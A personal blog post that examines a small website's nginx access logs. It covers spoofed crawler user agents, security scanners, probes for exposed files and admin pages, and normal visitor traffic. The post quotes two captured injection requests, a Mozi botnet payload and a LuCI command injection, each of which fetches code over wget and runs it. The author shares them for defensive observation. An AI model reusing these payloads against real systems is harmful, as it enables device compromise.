Fun with server logs

Posted on May 20, 2024

Now that I have carved myself a little island on the internet, it means that I have a server facing the public web, which of course gets hit by pretty much anything that’s out there, whether it’s automated or not, malicious or not.

It’s actually quite fun to do little investigations based on what’s in the logs, as it can give us a small sneak peek at what kind of traffic is going on out there, in the HTTP realm.

So let’s have a look into my nginx access logs (which by default are located at /var/log/nginx/access.log). First let’s see how much is in there (as of May 20th):

$ wc -l /var/log/nginx/access.log
19307 /var/log/nginx/access.log

Wow, ok, more than 19000 requests in something like a month, when in reality only a handful of people have directly requested the web pages. That shows there are tons of other stuff in there¹.

Small tangent: I haven’t plugged any analytics on my website for various reasons, but I still wanted to have a rough idea of how many somewhat unique hits I got on the website, and got some estimate using the following, which, quite nicely, doesn’t use anything fancy:

$ cat /var/log/nginx/access.log | grep "GET /css/fonts" | cut -d' ' -f 1 | sort | uniq | wc -l

This takes the logs, filter to keep only the requests that GET the fonts, then split by spaces, take the first field (the IP address), then sort and remove duplicates. It’s fairly accurate I think, since it requires to load any page, and then have the browser render the HTML and fetch CSS resources, which eliminates pretty much all automated traffic, from what I’ve seen. But back to the topic at hand.

First, how does it look like? Each access log line is broken down into the following items:

{ip} - - {date_time} {request} {response_code} {bytes_sent} {referrer_url} {user-agent}

If you’re wondering what these two small dashes are after the IP, the first is formatting, and the second is supposed to be {remote_user} but this is effectively empty for absolutely all entries I’ve looked at.

The only fields that might warrant a bit of an explanation, if you’ve not stumbled on that yet, are the {referrer_url} and the {user-agent}.

The referrer URL is just the adress from which the resource has been requested from. It’s just a HTTP header.

The User-Agent is a string which identifies the HTTP client that made the request. It can be empty, set to just the client, such as curl/7.54.1 for the curl CLI, or it can contain a more detailed description of the system, browser, and platform, such as

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0

There’s no guarantee that what’s put into the user-agent is actually trustworthy, as we’ll see further down.

Crawling in my ski– site

Of course we can expect the usual suspects that are crawling the web in order to index it, with Google the most obvious of these.

This should be easy to spot in the logs, right? I can find multiple entries related to Google because they’re nice and advertise that it’s their bot with a nice user-agent. Here’s one of them:

84.xxx.xxx.179 - - [24/Apr/2024:09:59:31 +0000] "GET /contact/ HTTP/1.1" 200 1197
"https://www.google.com/search?q=[blah]"
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

A user-agent containing Googlebot/2.1, and a link to Google’s documentation about their crawler, so this makes sense right? Except this isn’t Google.

User agents can be spoofed and this is one example. Google actually publishes the range of IPs for their crawlers, and this one isn’t part of it. A quick check of that IP address with a service like Spamhaus shows that this IP address has multiple listings in addresses blocklists. In this case, Spamhaus reports that

The machine using this IP is infected with malware that is emitting spam,
or is sharing a connection with an infected device.

So we know that we got a request which has been made to look like it came from a Google crawler, which didn’t come from Google, which is already pretty sus. And it also turns out that this IP has been listed as malicious. Now, the report continues:

Why was this IP listed?

84.xxx.xxx.179 has been classified as part of a proxy network. There is a
type of malware using this IP that installs a proxy that can be used for
nearly anything, including sending spam or stealing customer data.

So the malicious actor might not even posess the device which has this IP², but might have compromised it and is using it to emit malicious traffic.

Alright. Here’s an entry which is actually a Google crawler, with an IP that matches Google’s declared IP ranges.

66.249.66.41 - - [17/May/2024:05:38:16 +0000] "GET / HTTP/1.1" 200 2047 "-"
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Hi and sorry to disturb your little machine but…

Another entry that caught my eyes was this one:

198.235.24.14 - - [16/May/2024:22:52:42 +0000] "GET / HTTP/1.1" 200 5187 "-"
"Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple
times per day to identify customers&#39; presences on the Internet. If you would like
to be excluded from our scans, please send IP addresses/domains to:
scaninfo@paloaltonetworks.com"

Palo Alto Networks is a cybersecurity company, and Expanse is an acquisition they’ve made which specialises in attack surface management. So it looks like they’re simply scanning the web for security purposes.

In any case, I found it quite amusing to have that sort of user-agent indicating very nicely and explicitly what they’re actually doing.

It also got me thinking about how would it look if a security company or another entity was actively looking for vulnerabilities, i.e. doing potentially harmful requests, in a thoughtful manner. I guess a combination of telling it in the user-agent, plus a way to contact, and finally documenting which IP will be used for it. I haven’t seen such a thing though, besides the PAN simple and harmless GET request.

The low-hanging fruits farmers

The next category of entries is yet again about malicious actors. I expected that to show up, and even though I’m no cybersecurity expert, I still tried to configure rather simply but efficiently my hosting setup to minimize the attack surface, including refusing pretty much any traffic not HTTPS or SSH, and using a non-default port for SSH connections. But malicious HTTPS request will still land on my server, trying all sort of stuff to either access stuff they shouldn’t access, or compromise it. I do not know about all the web frameworks and site architectures out there, but most of those attempts are pretty basic, trying to take advantage of a misconfigured or poorly secured website.

This includes stuff like this:

5.xxx.xxx.69 - - [15/May/2024:22:28:18 +0000] "GET /.env HTTP/1.1" 404 564
"-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/120.0.0.0 Safari/537.36"

Sorry, I don’t have any secrets for you in any publicly accessible .env file.

There’s also these (and a few other variants):

184.xxx.xxx.252 - - [16/May/2024:01:43:30 +0000] "GET /webui/ HTTP/1.1"
404 134 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
---
185.xxx.xxx.145 - - [16/May/2024:22:48:12 +0000] "GET /admin/config.php HTTP/1.0"
404 162 "-" "xfa1"

which attempt to access some sort of administration interfaces that wouldn’t be protected.

Or even this, thanks for kindly providing your .dll to my non-Windows server:

145.xxx.xxx.70 - - [15/May/2024:21:14:44 +0000] "POST /scripts/WPnBr.dll HTTP/1.1"
404 162 "-" "curl/7.54.0"

There’s the usual attempt to do some shell shenanigans directly in a GET request, please back off:

175.xxx.xxx.183 - - [16/May/2024:12:27:56 +0000]
"27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;
/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 166 "-" "-"

There’s also this attempts to access an OpenWrt box through a web interface called Luci, and to execute some shell stuff in some way. The decoded request looks like this:

/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=
$(id>`wget+http://103.146.23.249/t+-O-+|+sh`)

All in all a collection of very low-sophistication attempts that rely on the fact that there are still a lot of servers and applications with blatantly open doors out there.

This could go on for a while, there’s a lot of other stuff, either obviously malicious, or just plain confusing:

There’s an actor exhaustively trying more than fifteen PHPMyAdmin versions for vulnerabilities or openly accessible interface or scripts, congratulations for being this methodical…
There’s a few requests that only GET the root from a curl user-agent, no idea what’s going on with those
There’s some request which try to GET (seemingly) completely arbitrary paths, like /zCFY which I haven’t linked to anything yet
And many more…

How about normal usage though?

So this was fun and all, but for the sake of completeness, here’s how it looks when someone (hopefully human) accesses the site to check it out:

88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET / HTTP/1.1" 200 1574 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /js/feather.min.js HTTP/1.1" 200 68387 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css HTTP/1.1" 200 2354 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:25 +0000] "GET /css/main.ac08a4c9714baa859217f92f051deb58df2938ec352b506df655005dcaf98cc0.css HTTP/1.1" 200 5617 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /fonts/roboto-mono-v12-latin-regular.woff2 HTTP/1.1" 200 12312 "https://jblort.fr/css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /fonts/fira-sans-v10-latin-regular.woff2 HTTP/1.1" 200 21244 "https://jblort.fr/css/fonts.2c2227b81b1970a03e760aa2e6121cd01f87c88586803cbb282aa224720a765f.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"
88.xxx.xxx.6 - - [07/Apr/2024:13:28:26 +0000] "GET /favicon.ico HTTP/1.1" 404 134 "https://jblort.fr/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0"

This collection of requests starts from the root and get a handful of ressource referenced by the index is what shows up when someone types in jblort.fr in a browser. A handful of JS, of CSS, and a few fonts, plus a missing favicon, and that’s it.

Quite not as interesting as the other entries, if you ask me.

And this is only the HTTPS requests that eventually reached the server. The virtual network which hosts the server has received way more connections in reality, on other ports, which it rightfully dropped in nearly all cases. The only other accepted traffic was just my ssh sessions here and there, and my CD script when deploying new versions. ↩︎
This is also why I won’t post that IP in full, because it probably doesn’t belong to a malicious person or org, but simply someone who’s had a device compromised. ↩︎